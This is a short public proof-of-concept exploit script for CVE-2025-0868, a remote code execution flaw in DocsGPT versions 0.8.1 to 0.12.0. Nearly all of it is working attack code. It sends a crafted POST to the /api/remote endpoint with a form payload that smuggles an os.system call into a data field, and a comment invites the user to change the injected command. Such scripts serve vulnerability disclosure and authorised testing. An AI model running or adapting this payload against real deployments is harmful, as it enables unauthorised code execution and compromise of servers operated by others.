# Exploit Title: DocsGPT 0.12.0 - Remote Code Execution
# Date: 09/04/2025
# Exploit Author: Shreyas Malhotra (OSMSEC)
# Vendor Homepage: https://github.com/arc53/docsgpt
# Software Link: https://github.com/arc53/DocsGPT/archive/refs/tags/0.12.0.zip
# Version: 0.8.1 through 0.12.0
# Tested on: Debian Linux/Ubuntu Linux/Kali Linux
# CVE: CVE-2025-0868

import requests
 
# TARGET CONFIG
TARGET = "http://10.0.2.15:7091"  # Change this
 
# Malicious payload string - carefully escaped - modify the python code if necessary
malicious_data = (
    'user=1&source=reddit&name=other&data={"source":"reddit",'
    '"client_id":"1111","client_secret":1111,"user_agent":"111",'
    '"search_queries":[""],"number_posts":10,'
    '"rce\\\\":__import__(\'os\').system(\'touch /tmp/test\')}#":11}'
)
 
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}
 
try:
    response = requests.post(f"{TARGET}/api/remote", headers=headers, data=malicious_data)
    print(f"[+] Status Code: {response.status_code}")
    print("[+] Response Body:")
    print(response.text)
except Exception as e:
    print(f"[-] Error sending request: {e}")